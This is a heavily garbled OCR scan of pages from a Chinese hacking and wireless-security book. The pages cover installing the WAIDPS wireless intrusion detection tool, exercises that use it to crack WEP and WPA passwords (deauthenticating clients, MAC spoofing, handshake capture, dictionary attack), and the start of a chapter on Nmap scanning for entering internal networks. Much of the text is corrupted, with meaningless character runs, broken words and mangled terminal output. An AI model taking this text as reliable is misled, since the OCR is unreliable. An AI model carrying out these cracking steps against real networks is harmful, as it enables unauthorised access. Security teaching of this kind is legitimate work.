号 民 呈 SSE 3A 
吕 出 已 号 六 加 总 
加 叶 月 与 只 旺 避 


CO 
一 | 
[二 
[i 
[= 


ERPUL HMAI 


Ee 
主 
-J 
| 
ee 
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9.5 “无 线 网 络 入 侵 检 测 系统 


WAIDPS 是 一 款 由 Python 编写 的 无 线 
入 侵 检 测 工 具 ， 基 于 Linux 平 台 并 且 完 全 
开源 。 它 可 以 探测 包括 WEP/WPA/WPS 
在 内 的 无 线 入 侵 与 攻击 方式 ， 并 可 以 收 
集 WiFi 相 关 的 所 有 信息 ， 当 无 线 网 络 中 存 


File Not found in /.SYWorks/WAIDPS/waidps.py 


[eg . ， 
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在 攻击 时 ， 系 统 会 显示 于 屏幕 并 记录 在 日 
志 中 。 


9.5.1 安 疙 WAIDPS 


安装 WAIDPS 系 统 是 使 用 该 系统 进行 无 
线 入 侵 检测 的 前 提 。 安 装 WAIDPS 的 操作 步 
又 如 下 : 
打开 https://github.com/SYWorks/ 
Waidps 链 接 ， 单 击 Clone or download 按 钮 ， 
如 下 图 所 示 。 


Find file | 
| 
Clone with HTTPS G) 
Jse Git or checkout with SVN using the web URL 
tt gitl 印 | aidps .git 民 
Open in Desktop Download ZIP 


单 击 Download ZIP 按 钮 下 载 压缩 包 ， 
解压 后 有 三 个 文件 ， 如 下 图 所 示 。 


名 


LICENSE README.md waidps.py 


切换 到 文件 目录 ， 在 终端 执行 ./ 
waidps.py 命 令 便 可 以 安装 WAIDPS， 首 次 运 
行 会 下 载 一 些 必 要 的 文件 ， 如 下 图 所 示 。 


Copy file from [/root/Downloads/waidps-master/waidps-master/waidps.py] to [/.SYWorks/WAIDPS/waidps.py ] 


You can now run from 
cd /.SYWorks/WAIDPS/ 

. /waidps .py 

Press Any Key To Continue... 


A - ne { | NAPAN 


le mac-oul.db 3 


Default Selected ==> Y 


[ . 
[ 工 ] File SuccessfuLLy saved to /.SYWorks/Database/mac-oui.db 


by doing the following : 


Downloading file from https://raw.githubusercontent.com/SYWorks/Database/master/mac-oui.db 


[step 贺 下 载 完 成 后 按 Enter 键 ， 会 给 出 WAIDPS 系 统 帮 助 信息 ， 如 下 图 所 示 。 


墨客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


Creating database files.... 


; ./waidps.py [optioms] <args> 


--help 


show basic help message and exit 


chm 
JNDW 


advanced help message and ex1it 


-"iface <arg> - Set Interface to use 


-tt --timeout <arg> - Duration to capture before analysing the captured data 


xamples: ./waidps.py --update 


“ywaidps,py -i wlang 


/waidps.py --iface wlanl 
入 人 
孙 bl 


安装 完成 后 WAIDPS 会 在 根 目 
建 .SYWorks 目 录 ，/.SYWorks/WAIDPS 是 主 
目录 ， 其 中 包含 waidsp.py 脚 本 文件 ， 如 下 
图 所 示 。 

:/.SYWorks# ls 


Database Saved WAIDPS 
:/.SYWorks# cd WAIDPS/ 


aptured 


:/.SYWorks/WAIDPS# LS 


pktconfig.ini Stn.DeAuth. 


9.5.2 局 动 WAIDPS 


安装 好 WAIDPS 后 ， 就 可 以 启动 WAIDPS 
具体 操作 步骤 如 下 : 


痢 站 不 阁 关 大好 从 六 六 闻 丰 大 在 从 阐 下 不 在 闪闪 六 站 gs'S S404 
其 大 开 天 放 杂 。 术 江 检 江 谨 亲 谨 训 闪闪 天 好 
DH 李 闪 td 闪闪 洛 玉 洁 姑 水 党 

2 检 # 检 李 术 检 六 并 不 存 失 关 藉 术 疮 检 术 六 放 雁 

其 此 闪闪 六 涉 厌 克 丰 地 失 大 六 检 江 六 水 其 让 
Li 闪闪 bd 六 六 淹 浊 六 兴 # 好 

其 厄 闻 六 下 其 检 闽 玉 提 帮办 扩 斥 碎 丰 帮 丰 关 。 江 不 闻 检 放 放 放 雁 
s11YIIWIIoIIRIIKIISI JPIIRI1211S1IRIIAIINIINIIIIINII15SI 


syworks 


ection & Preventi System, By SYCh 


RU A 
STA ENC 


a WSTEOSS 
CIPHER 


WE RE LE 


AUTH CH PWR Range L115 
:83:; 33:00:73 日 


4:68:A3:7D:37:91 日 


None 6 29 / .GOD 

None = 1 -54 AVera0oe 
| CCMP/TKIP 
A None 


[1] Client - 5C:A8:6A:EC:A2:F8 
2D:7D:8C PA2 CCMP 


:33:60:73 8 HPA2 CCMP 
89:1E:9D 日 WPA2 CCMP 


如 果 没 有 做 出 其 他 操作 ， 默 认 等 待 30s 后 


So 
WPS 


使 用 WAIDPS 之 前 建议 使 用 airmon-ng 
check kill 命 令 ， 关 闭 不 必要 的 进程 ， 如 下 图 
所 示 。 


:~# alrmon-ng check kill 


illing these processes: 


PID Name 
686 wpa supplicant 


使 用 airmon-ng start wlan0 命 令 ， 
将 无 线 网 卡 设 置 成 monitor 模 式 ， 如 下 图 
所 示 。 


:~ 大 alirmon-ng start wlang 


HY Interface Driver Chipset 


phye wlang rt2866usb Ralink Technotogy，cCorp。RT28707RT367D 


(mac8821] monitor mode vif enabled for 
(mac80621] 


切换 到 WAIDPS 主 目录 ， 使 用 ./ 
waldps.py -1 Wlan0mon 尼 动 WAIDPS 系 统 ， 
如 下 图 所 示 。 


[phy@ jwlang on [phye]jwtanemon 
station mode vif disabled for [phyBjwlLang) 


Version 1.0, R.6 (Updated - 10 Oct 2014) 


(at) gmail .com 


UES NG 
Ver LCK ESSID 


Unknow 
HUAWEI TECHNOLOGIES 
| l 


NK TECHNDLOGIIE 


HUAWEI TECHNOLOGIES C0.,LTD 


UnNnKkNown 
EE INK TECHNOLOGIES 
es 
CD 


mp 


进入 扫描 状态 ， 如 下 图 所 示 。 


< < << SUMMARY LISTING >> > > 


: 13 [© WPS 


SSID Name CMCC-X] ] 

a, BSSID E4:68:A3:7C:EF:F2 ] 
Details : OPN / None / - 
Client ] 

，BSSTD B4:15:;13:8C:10:A2 | 
Details : OPN / None / - 
Client [ ] 


-44 dBm / Good 
Channel : 1 


- Signal 


- Signal 


-56 dBm / Average 
Channel :; 1 


: Shown above are Access Points with 
Senario where similar names are commonly found in organization, 
Multiple 


;018- = 日 9;29 


Note 


Reported 


在 扫描 状态 下 ，WAIDPS 会 开启 两 个 终 


图 所 示 。 


156 


i 1? 


而 


HUAWEI TECHNOLOG 
CLient :; 0 


HUAWEI TECHNOLOGIE 
Client : 9 


Similar Name, Evil-Twin in normal casss are usually open network or 5 known. 
airport, 
found on said Access Point detect may indicate high possibility of 


mall, hotel, campus, etc where the area is big. 


口 ， 用 于 抓 取 数 据 包 以 及 扫描 AP， 如 下 


BB 
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Runnins gz user "root" ond sroup "root", This ould be donserous 
tharks: Ue ‘Wo « 


“Fs Se haz en disabled due vo runnins Hire et .95 suUPe S 
ea en i OFS Capture tupr pos ePrivileses for helF in Funnings Hir shark ee ye unp 


CH ll ][ EloFsed: 36 # ][ 2018-1i1-21 02334 ][ S47 G6 1i7 
or /sz CH ENC CIPHER AUTH ESSID 
E: 0A: 1B:91 
nm i 
了 


SK mideo_ac_0962 
3 CHCC 
CHCC-HJ 
CHCC-KT 


ye 


(roro 了 
EE 上 


通过 按 Enter 键 ， 切 换 到 命令 模式 ， 如 下 图 所 示 。 


[Enter] 


- About Application - Application Configuation - 0utput Display F - Filter Network Display 


- History Logs / Cracked DB - Lookup MAC/Name Detail - Monitor MAC Addr / Names 0 - Operation Dptions 


- Auditing Network - Interactive Mode (Packet Ana - Intrusion Prevention xX - Exit Application 


our opt1io ( <default = return> ) 加 


按 D 键 输出 显示 选项 ， 如 下 图 所 示 。 


This option allow user to switch display on the various viewing type of access point and station information. 


0Q/H - s Points & Stations Listing Display 

1/A - Display Access Points Listing Only 

2/5 - Display Stations Listing Only 

3/B Dispay Both Access Points & Stations Listing (Separated View) 

4/P - Advanced View with Probes Request (Merging associated Stations with Access Points) - [Recommended] 
5/0 - Advanced View without probing request (Merging associated Stations with Access Polnts ) 


6/C Display one time bar chart of Access Points information 
+/D - Display client which associated with more than one access point. 


7/N Show Association/Connection Alert. 
8/U - Show Suspicious Activity Listing Alert. 
9/ 工 - Show Intrusion Detection/Attacks Alert. 


Current Setting = 4 
Choose an option Return : 四 


此 选项 允许 用 户 在 各 种 访问 点 和 站 点 信息 的 查看 类 型 上 切换 显示 。 


0/H: 隐藏 访问 点 和 站 点 列表 显示 。 

1/A: 仅 显 示 接 入 点 列表 ， 隐 藏 天 联 客 户 机 。 

2/S: 仅 显 示 客 户 机 列表 〈 包 含 关 联 与 不 关联 的 ) 

3/B: 在 不 同 区 域 分 别 显 示 接 入 点 与 客户 机 列表 。 

4/P: 带 有 探测 请 求 的 高 级 视图 (将 相关 的 站 点 与 接 入 点 合并 ) ， 该 选项 也 是 默认 
推荐 的 。 

5/O: 没有 探测 请 求 的 高 级 视图 (合并 相关 站 点 和 接 入 点 ) 

6/C: 显示 接 入 点 信息 的 时 间 条 形 图 。 

+/D: 显示 与 多 个 接 入 点 相关 联 的 客户 端 ， 此 步骤 帮助 获知 除 目标 接 入 点 外 ， 
还 有 其 他 接 入 点 。 

7/N: 显示 关联 /连接 警报 ， 默 认 是 开启 状态 。 

8/U: 显示 可 疑 活动 列表 和 警告， 默认 是 开启 状态 。 

9/I: 显示 入 侵 检 测 /攻击 警报 ， 默 认 是 开局 状态 。 


[step 图 在 程序 中 输入 义 可 以 退出 程序 ， 如 下 图 所 示 。 


黑客 攻防 与 无 线 安全 从 新 手 到 高 手 〈《 超 值 版 ) 


Enter your option : ( <default = return> ) : X 
Selected ==> X 


Are you sure you want to exit ( Y/N ) 


9.6 ”实战 演练 


实战 演练 1 一 一 使 用 WAIDPS 系 统 破 解 WEP 密 码 
WAIDPS 入 侵 检 测 系统 同样 具有 密码 破解 功能 ， 通 过 它 可 以 检查 网 络 设置 是 否 够 安 
人 全。 破解 WEP 密 码 步 又 如 下 : 


讲 入 WAIDPS 目 录 ， 使 用 ./waidps.py -i wlan0mon 命 令 启 动 WAIDPS 系 统 ， 按 Enter 
键 ， 切 换 到 命令 模式 ， 如 下 图 所 示 。 


[Enter] 


About Applicatio Application Configuation Output Display Filter Network Dis 
History Loas / Cracked [ Lookup MAC/Name Detail Monitor MAC Addr / Names Operation Dptions 
- Auditing Network - Interactive Mode (Packet Analysis) - Intrusion Prevention - Exit Application 


Enter your optio ( <default = return> ) : 


[step 图 按 下 A 键 进入 网 络 审计 页 面 ， 这 里 会 列 出 附近 AP 列表 ， 如 下 图 所 示 。 


IN, MAC Address Enc cipher Autl signal Last See WPS 
WEP WEP GCMP - 2618-11-21 93:36 :6 9 min ago] - 
WPA2 CCMP PSK 2618-11-21 03:30: 
WPA2 CCMP PSK 2018-11- 03:29. 
WPA2 CCMP/TKIP PSK 2018- -21] 03:29: 
WPA2 CCMP PSK 2618-11-21 03:29: 
WPA2 CCMP PSK 2018 03:29: 9 min ago0] 
WPA2 CCMP PSK 2018- -21] 63:29: 9 Min ago0] 
WPA2 CCMP pSK 2018- -21 03:308:t 9 min ago] 
WPA2 CCMP PSK 2018 93:30:92 [6 min ago] 


CD 
NO NN 


9 min agol] 
9 min agol 
| 
9 min ago] 


nnROU Nm OU 
WwW ww WwW 
Oo W Tv 


iD 0 


WPA/WPA2 : 8 WPA/WPA2 (WPS Enabled) : 


Key in [Help] to display other options. 
Select a target/option ( Default - Return ) : | 


输入 WEP， 筛 选 出 WEP 加 密 的 AP 列表 ， 如 下 图 所 示 。 


: WEP 


MAC Address chn Enc Cipher Auth Signal Last Seen WPS STN ESSID 
1 WEP WEP GCMP 2018-11-21 03:30:01 [9 min ago] | 


Key in [Help] to display other options. 
Select a target/option ( Default - Return ) : 加 


[step 贺 这 里 可 以 通过 目标 MAC 地 址 或 者 序号 来 选择 AP， 因 为 只 有 一 项 所 以 选择 1 即 可 
里 会 给 出 建议 攻击 模式 ， 如 下 图 所 示 。 


风 


AP BSSID [ 1LIC:FA:68:01:2F:08 | Signal 

MAC Addr [ 1LC:FA:68:91:2F:98 ]'s MAC OUI belongs to | 

BSSID [ 1C:FA:68:91:2F:98 ]'s Name is [ Test-001 |]. 

Details : WEP WEP GCMP - Channel : Client : 
Clients 


Please note that after target selection is confirm, all current monitoring process will be terminated. 


Suggested Attack Mode : WEP 


- Crack WEP Access Point 
- Capture WPA Handshake 
- WPS Bruteforce PIN 
Live Monitor Access Point 
Select an option ( 1/2/3/4/90 Default - 


1>8 
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step 国 选择 第 一 项 使 用 WEP 方 式 攻击 ， 这 里 会 给 出 提示 ， 是 否 使 用 虚假 MAC 地 址 ， 如 下 图 


[1] WEP Encryption Auditing 
Application will send broadcast deauthentication signal to all clients connected to the 
gnal between client and access point if any clients were found connected to the access point. 
List of detected client MAC. 


MAC ID : DC:6D:CD:66:FE:CB 


Enter the MAC to Spoof Xxx:xx:xx:xx:xx:xx : ( Default - NIL ) : 


直接 按 Enter 键 ，WAIDPS 系 统 会 锁定 AP 并 尝试 使 用 虚假 MAC 地 址 进行 连接 ， 如 下 
所 示 。 


Time Start ; 261: 


2618-11-21 63:45:5 


IC:FA:68:01:2F:08 OUTI TP-LINK TECHNOLOGIES CO.,LTD. 
Tesft-991 

WEP WEP GCMP 

| -15 dBm 

2018-11-21 93:29:58 2018-11-21 8683:3 

wl anQmor I 

wlmonO 

atmo 


EE 15 den ( 65 * 


[step 辆 按 Enter 键 ， 在 出 现 的 其 他 选项 中 ， 选 择 2 中 断 现 有 客户 端的 连接 ， 如 下 图 所 示 。 


- Stop Authentication 

- Deauth CLient 
List Client 

- Spoof MAC address 
Fl1 - Fake Authentication (1 Time) F2 - Fake Authentication (Continous) 
Return 


Select an option ( - Return ) : 2 
Selected ==> 2 


1C:FA:68:01:2F:08 


中 断 连 接 后 ， ea 等 待 获取 足够 多 的 [Vs， 从 而 
破解 出 密码 ， 并 给 出 相应 的 提示 信息 。 


实战 演练 2 一 一 使 用 WAIDPS 系 统 破解 WPA 密 码 


使 用 WAIDPS 系 统 破 解 WPA 密 码 的 操作 步骤 如 下 : 
启动 系统 按 Enter 键 切换 到 命令 模式 ， 在 命令 模式 下 选择 A 网 络 ， 如 下 图 所 示 。 


Command Selection Menu 
About Application Application Configuation Qutput Display Filter Network Display 
History Logs / Cracke' Lookup MAC/Name Detail Monitor MAC Addr / Names ( Operation 0ptions 
Auditing Networ Interactive Mode (Packet Analysis) Intrusion Prevention EXit Application 


Enter your option : <default = return> ) : A 


[step 图 在 扫描 出 的 AP 列表 页 面 中 输入 WPA， 从 AP 列表 中 输入 序号 ， 如 下 图 所 示 。 


Encryption Filter : 


MAC Address Cipher Signal Last WPS STN ESSID 
] FA:I 61:2F ] WPA2 CCMP/TKIP PSK 2018- - = 

PS 2018- 

CCM SK 2018- 

CCMP PSK 2018 

国 图 5 2018- 


WARNING - NOT FOR ILLEGAL 


Key in [Help] to display other options 
Select a target/option ( Default - Ret 
Selected ==> 1 


这 里 建议 攻击 模式 为 WPA， 如 下 图 所 示 。 


LY 


墨客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈 超 值 版 ) 


Selected Target 
AP BSSID | ] Signal : -25 dBm 
MAC Addr [ 1LC:FA:68:01:2F:08 ]'s MAC OUI belongs to [I 
BSSID [ 1C:FA:68:01:2F:08 ]'s Name is [ Test-001 |]. 
Details : WPA2 / CCMP/TKIP / PSK Channel : Client 


Previous Detail From Database 


Please note that after target selection is confirm, all current monitoring process will be terminated. 


Ssuggested Atta - Mode 


Crack WEP Access Point 
- Capture WPA Handshake 
- WPS Bruteforce PIN 
Live Monitor Access Point 
Retrun 
[?] Select an option ( 1/2/3/4/0 Default 


按 Enter 键 开始 通过 字典 进行 密码 破解 ， 如 下 图 所 示 。 


[1] Shutting down all interfaces 


[.] itoring f 


Selected Interface ==> 
Selected Monitoring Interface ==> 
Selected Attacking Interface 
Selected Managing Interface 


[1] WPA Handshake Capturing 
Application will send broadcast deauthentication signal to all clients connected to the 
gnal between client and access point if any clients were found connected to the access point. 


[?] Previous scan found I[ ] client, Rescan for client ? ( Y/n ) : 中 


[step 图 设置 密码 位 置 ， 在 命令 模式 C 选 项 的 第 9 项 进行 设置 。 这 里 也 有 默认 密码 文件 ， 如 下 


Command Selection Menyu 
B - About Applicatior - Application Configuation D - Output Display FF - Filter Network Display 
- History Logs / Cracked DB - Lookup MAC/Name Detail - Monitor MAC Addr / Names - Operation 0ptions 
Auditing Network Interactive Mode [Packet Analysis) Intrusion Prevention Exit Application 


Enter your option : {( <default = return> ) : C 


Appl cation LonTigmnt on 
nge Re egutato ory Domain 
of information 
ne before remov ling inactive AP/Station 
de inactive Access Point/Station 
- Beep 1if alert found 
Sensitivity of IDS 
Save PCap when Attack detecte d 
/MH - Save PCap when Monitor ed MAC/Name seen 
1 ~ Whitelist ”eng \ Sypa ss alert Tor MAC/Name) 
/I Dictionary Detail and tting | 


Choose an option ( D/R/T/H/B/W/C ) : 有 


[eg 国 选择 第 9 项 ， 可 以 添加 或 修改 字典 文件 ， 如 下 图 所 示 。 


Dictionary Setting 
This option allow user to add list of dictionary for passwords cracking.. 


- Add dictionary location 

- Set default dictionary 

- Delete dictionary location 
Select an option ( A/S/D ) 
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第 9 章 ，” 无线 网 络 中 的 虚拟 AP 技术 


9.7 “小 试 身 手 


练习 1: 熟悉 虚拟 AP 技术 ， 伐 得 如 何 防 御 虚 拟 AP。 
练习 2: 使 用 Windows10 系 统 搭建 虚拟 AP。 
练习 3: 搭建 WAIDPS 无 线 网 络 入 侵 检 测 系统 。 
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第 10 量 ”从 无 线 网 络 渗透 内 网 


网 络 通信 是 基于 TCP/IP 的 四 层 网 络 模型 ， 因 此 在 每 一 层 都 可 以 通过 特定 的 通信 协议 发 
现存 活 主 机 ， 从 而 实现 从 无 线 网 络 渗透 到 内 网 的 操作 。 本 章 介 绍 从 无 线 网 络 渗透 到 内 网 的 
方法 ， 主 要 包括 扫描 工具 Nmap 的 应 用 、 二 层 扫 描 、 三 层 扫 描 、 四 层 扫 描 等 。 


10.1 认识 扫描 工具 Nmap 


Nmap 是 一 个 网 络 连 接 端 扫描 软件 ， 
通过 扫描 可 以 确定 哪些 服务 运行 在 哪些 连 
接 端 ， 并 且 推 断 计 算 机 运行 哪个 操作 系 
统 ， 是 网 络 绾 理 员 常用 的 扫描 软件 之 一 。 
直接 输入 Nmap 命 令 ， 便 会 打开 Nmap 的 帮 
助 信息 。 


10.1.1 目标 发 现 帮 助 信息 


除了 选项 ， 所 有 出 现在 Nmap 命 令 行 上 
的 都 被 视 为 对 目标 主机 的 说 明 ， 最 简单 的 
情况 是 指定 一 个 目标 IP 地 址 或 主机 名 。 下 图 
为 目标 发 现 的 帮助 信息 。 


TARGET SPECIFICATION: 
Can pass hostnames, IP addresses, networks, etc. 
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 
-iL <inputfilename>: Input from list of hosts/networks 
-iR <num hosts>: Choose random targets 


--eExclude <host1[,host2][,host3],...>: Exclude hosts/networks 
--excludefile <exclude file>: Exclude list from file 


参数 说 明 如 下 : 

e -iL <inputfilename>: 将 不 同 的 IP 
地 址 保存 成 文件 ， 用 这 个 参数 导入 
文件 。 

e@ -iR <num hosts>: 随机 选择 目标 ， 
num hosts 表 示 目 标 数 目 ，0 表 示 扫 
描 不 中 断 。 例 如 : Nmap -iR 100 -p 
135 任 意 选 取 100 个 IP 地 址 扫描 135 
端口 。 

© --exclude <hostl |, host2| [, host3 |， 
...>: 排除 主机 /网 络 ， 例 如 : Nmap 
192.168.1.0/24 --exclude 1-100 去 除 掉 
前 100 个 地 址 ， 从 101 开 始 扫 描 。 


e@ --excludefile <exclude file>: 将 需要 


排除 的 地 址 存放 到 一 个 文件 当中 ， 
用 该 参数 指定 。 


10.1.2 主机 发 现 帮助 信息 


任何 网 络 探测 任务 的 最 初 几 个 步骤 就 
是 把 一 组 IP 范 围 ( 有 时 该 范围 很 大 ) 缩小 为 
一 列 活动 的 或 者 感 兴趣 的 主机 ， 扫 描 每 个 IP 
的 每 个 问 口 很 慢 ， 通 常 也 没 必要 ， 扫 描 什 
么 样 的 主机 主要 依赖 于 扫描 的 目的 。 

发 送 探测 包 到 目标 主机 ， 奉 收 到 回 
复 ， 则 说 明 目 标 主机 是 开局 的 ，Nmap 文 持 
约 10 种 不 同 的 主机 探测 方式 ， 默 认 友 送 4 种 
请 求 : 

(1) ICMP echo request。 

(2) a TCP SYN packet to port 443 。 

(3) a TCP ACK packet to port 80。 

(4) an ICMP timestamp request。 


主机 发 现 帮助 信息 ， 如 下 图 所 示 。 


HUST UISCLUVERY : 

| -sL: List Scan - simply list targets to scan 

-Sn: Ping Scan - disable port scan 

| -Pn: Treat all hosts as online -- skip op mn 

-PS/PA/PU/PY[portlist]: TCP SYN/ACK, UDP o ery to giv por 

-PE/PP/PM: ICMP echo, timestamp, and cli regu nt discovery Re 
tated list]: Protocol Ping 

| -n/-R r do DN solution/Always resolve [default: sometimes] 

- -dns- servers pe et .>: Specify custom DNS servers 
-System-dns: Use 05's DNS resolver 

--traceroute: path to 


参数 说 明 如 下 : 

e -sL: List Scan 列表 扫描 ， 仪 将 指定 
的 目标 人 P 列 举 出 来 ， 并 不 进行 扫描 。 
例如 : Namp -sL 192.168.1.0/28。 

e -sn: Ping Scan 只 利用 Ping 扫 描 进 
行 主 机 发 现 ， 不 进行 端口 扫描 。 默 
认 情 况 下 发 送 ICMP 回 声 请 求 和 一 
个 TCP 报 文 到 80 端 口 ， 非 特权 用 户 
发 送 一 个 SYN 报 文 到 80 闯 口 。 可 以 


ch host 


和 除 -PO 之 外 的 任何 发 现 探测 类 
型 -P* 选 项 结合 使 用 以 达到 更 高 的 
-Pn: 将 所 有 指定 的 主机 视 作 开启 
的 ， 跳 过 主机 发 现 的 过 程 。 

-PS [portlist]: TCP SYN Ping， 发 
送 一 个 设置 了 SYN 标 志 位 的 空 TCP 
报 文 。 默 认 端 口 为 80 〈 可 设置 ) ， 
也 可 指定 端口 。 目 标 主机 端口 关 
闭 ， 回 复 RST， 端 口 开 放 ， 则 回 
复 SYN/ACK,， 但 都 表明 目标 主机 
在 线 。UNIX 机 器 上 ， 只 有 特权 用 
户 才 能 发 送 和 接收 原始 的 TCP 报 
文 ， 因 此 非特 权 用 户 进 行 系统 调用 
connect()， 也 发 送 一 个 SYN 报 文 来 
尝试 建立 连接 。 

-PA [portlist]: TCP ACK Ping， 发 
送 一 个 设置 了 ACK 标 志 位 的 TCP 报 
文 。 默 认 端 口 为 80( 可 设置 ) ， 也 
可 指定 端口 。 目 标 主 机 在 线 ， 回 复 
RST， 不 在 线 则 超时 。UNIX 机 器 
上 ， 只 有 特权 用 户 才 能 发 送 和 接收 
原始 的 TCP 报 文 ， 因 此 非特 权 用 户 
进行 系统 调用 connect()， 也 发 送 一 
个 SYN 报 文 来 尝试 建立 连接 。 

-PU [portlist]|: UDP Ping， 发 送 一 
个 空 的 UDP 报 文 到 指定 的 端口 。 默 
认 端 口 为 31338 〈 可 设置 ) 。 优 势 是 
可 以 穿越 只 过 滤 TCP 的 防火 墙 或 过 
滤器 。 帮 端口 关闭 ， 则 回复 ICMP 端 
口 无 法 到 达 ， 说 明 主 机 在 线 ， 其 他 
类 型 的 ICMP 错 误 如 主机 /网 络 无 法 
到 达 或 者 TTL 超 时 则 表示 主机 不 在 
线 ; 没有 回应 也 被 这 样 解释 ， 但 不 
一 定 正 确 〈 因 为 大 多 数 开 放 该 端口 
的 服务 会 忽略 该 UDP 报 文 ) 。 

-PY [portlist]: 发 送 一 个 SCTP 数 
据 ， 用 于 传输 语音 的 一 个 协议 。 
-PE/-PP/-PM: ICMP Ping Types， 发 
送 ICMP Type 8〈 响 应 请 求 ) 报 文 ， 
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期 等 从 运行 的 主机 得 到 一 个 Type 0 
( 啊 应 ) 报 文 。 

e -PO: 使 用 IP 协 议 的 Ping 来 进行 
扫描 。 

e -n: 不 用 域名 解析 ， 加 快 扫描 速度 。 

e -R: 为 所 有 目标 IP 地 址 做 反 向 域名 
解析 。 

@ --dns-servers<serv| (,serv2), .. >: 使 
用 指定 的 域名 服务 器 进行 解析 ， 一 
般 不 使 用 该 选项 ， 因 为 比较 慢 。 例 
如 :Nmap --system-dns 8.8.8.8 www- 
baidu.com 不 使 用 系统 指定 的 DNS 服 
务 器 。 

e --system-dns: 使 用 操作 系统 默认 的 
DNS 服务 器 ， 加 与 不 加 一 样 。 

e --traceroute: 路 由 追踪 ， 同 使 用 系统 
目 带 的 traceroute 效 果 类 似 。 例 如 : 
Nmap www.baidu.com --traceroute -p 


80。 下 图 为 执行 效果 。 


rootakali:~# Nmap www.baidu.com --traceroute -p 56 

starting Nmap 7.70 ( https://nmap.org ) at 26018-10-28 07:07 EDT 
Nmap scan report for www.baidu.com (226.181.111.188) 

Host is up (0.054s Latency ) . 

Dther addresses for www.baidu.com (not scanned): 220.181.112.244 


PORT STATE SERVICE 
B80/tcp open http 


TRACEROUTE (using port 443/tcp) 
HOP RTT 


1 。。。 13 
14 65.58 ms 220.181.111.188 


Nmap done: 1 IP address [1 host up) scanned in 6.52 seconds 


10.1.3 ”端口 扫描 帮助 信息 


Nmap 这 些 年 来 功能 越 来 越 多 ， 它 也 是 
从 一 个 高 效 的 端口 扫 摘 器 开始 的 ， 并 且 这 
仍然 是 它 的 核心 功能 。Nmap<targe 人 这 个 简 
单 的 命令 扫描 主机 <target> 上 超过 1660 个 的 
TCP 端 口 。 

许多 传统 的 端口 扫描 器 只 列 出 所 有 端 
口 是 开 放 还 是 关闭 的 ，Nmap 的 扫描 信息 量 
更 加 详细 ， 它 把 端口 分 成 六 个 状态 : 

open 《开放 的 ) 、closed (关闭 的 ) 、 
filtered (被 过 小 的 ) 、unfiltered (未 被 过 滤 
的 ) 、openlfiltered (开放 或 者 被 过 小 的 ) 
和 closedlfiltered (关闭 或 者 被 过 小 的 ) 。 
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黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈《 超 值 版 ) 


1. open 〈 开 放 的 ) 


应 用 程序 正在 该 端口 接收 TCP 连 接 或 者 
UDP 报 文 ， 发 现 这 一 点 常常 是 并 口 扫 揪 的 
主要 目标 。 安 全 意识 强 的 人 都 知道 每 个 开 
放 的 端口 都 有 可 能 是 攻击 的 入 口 。 攻 击 者 
或 者 入 侵 测试 者 想 要 发 现 开放 的 端口 。 而 
管理 员 则 试图 关闭 它们 或 者 用 防火 墙 保护 
它们 ， 以 免 妨 碍 合法 用 户 ， 非 安全 扫描 可 
能 对 开放 的 端口 也 感 兴趣 ， 因 为 它们 显示 
了 网 络 上 哪些 服务 可 供 使 用 。 


2. closed (关闭 的 ) 


关闭 的 端口 对 于 Nmap 也 是 可 访问 的 
( 它 接受 Nmap 的 探测 报 文 并 做 出 啊 应 〉， 
但 没有 应 用 程序 在 其 上 监听 ， 它 们 可 以 显 
示 该 卫 地 址 上 《主机 发 现 ， 或 者 Ping 扫 摘 ) 
的 主机 正在 运行 up 也 对 部 分 操作 系统 探测 
有 所 帮助 。 因 为 关闭 的 端口 是 可 访问 的 ， 
也 许 过 会 儿 值 得 再 扫描 一 下 ， 可 能 一 些 又 
开放 了 。 系 统管 理 员 可 能 会 考虑 用 防火 墙 
封锁 这 样 的 端口 ， 因 此 就 会 被 显示 为 被 过 
滤 的 状态 。 


3. filtered (被 过 滤 的 ) 


由 于 包 过 滤 阻 止 探 测报 文 到 达 端 口 ， 
Nmap 无 法 确定 该 端口 是 否 开 放 ， 过 滤 可 能 
来 自 专业 的 防火 墙 设备 、 路 由 器 规则 或 者 
主机 上 的 软件 防火 墙 ， 这 样 的 并 口 一 般 扫 
描 几乎 不 提供 任何 信息 。 有 了 时候 它 们 啊 应 
ICMP 错 误 消 息 ， 如 类 型 3 代码 13〈 无 法 到 
达 目 标 : 通信 被 管理 员 禁 止 》， 但 更 普遍 
的 是 过 滤器 只 是 丢弃 探测 帧 ， 不 做 任何 啊 
应 。 这 迫使 Nmap 重 试 知 干 次 以 防 探测 包 是 
由 于 网 络 阻塞 而 丢弃 的 ， 由 此 使 得 扫描 速 
度 明 显 变 慢 。 


4. unfiltered (未 被 过 滤 的 ) 


未 被 过 滤 状 态 意 味 着 闯 口 可 访问 ， 但 
Nmap 不 能 确定 它 是 开放 还 是 关闭 ， 只 有 用 
于 映射 防火 场 规则 集 的 ACK 扫 描 才 会 把 端 


164 


口 分 类 到 这 种 状态 。 用 其 他 类 型 的 扫描 如 
窗口 扫描 、SYN 扫 描 或 者 FIN 扫 描 来 扫描 
未 被 过 滤 的 端口 ， 可 以 帮助 确定 端口 是 否 
天 成。 


5. openlfiltered (开放 或 者 被 过 滤 的 ) 

当 无 法 确定 端口 是 开放 还 是 被 过 滤 
的 ，Nmap 就 把 该 端口 划分 成 这 种 状态 。 开 
放 的 端口 不 啊 应 就 是 一 个 例子 。 没 有 啊 应 
也 可 能 意味 着 报 文 过 滤器 丢弃 了 探测 报 文 
或 者 它 引 发 的 任何 啊 应 ， 因 此 Nmap 无 法 确 
定 该 端口 是 开放 的 还 是 被 过 滤 的 。 


6. closedlfiltered (关闭 或 者 被 过 
滤 的 ) 


该 状态 用 于 Nmap 不 能 确定 端口 是 关闭 
的 还 是 被 过 滤 的 ， 它 只 可 能 出 现在 IPID Idle 
扫描 中 。 

端口 扫描 的 帮助 信息 ， 如 下 图 所 示 。 


-SS/ST/SA/SW/SM: TCP SYN/Connect()/ACK/Window/Maimon scans 
-SU: UDP Scan 

-SN/sF/sX: TCP Null, FIN, and Xmas scans 
--scanflags <flags>: Customize TCP scan flags 
-SI <zombie host[:probeport]>: Idle scan 
-SY/sZ: SCTP INIT/COOKIE-ECHO scans 

-Ss0: IP protocol scan 

-b <FTP relay host>: FTP bounce scan 


参数 说 明 如 下 : 

e -SS: TCP SYN 扫 描 ， 半 开放 扫描 ， 
扫描 速度 快 ， 不易 被 注意 到 不 
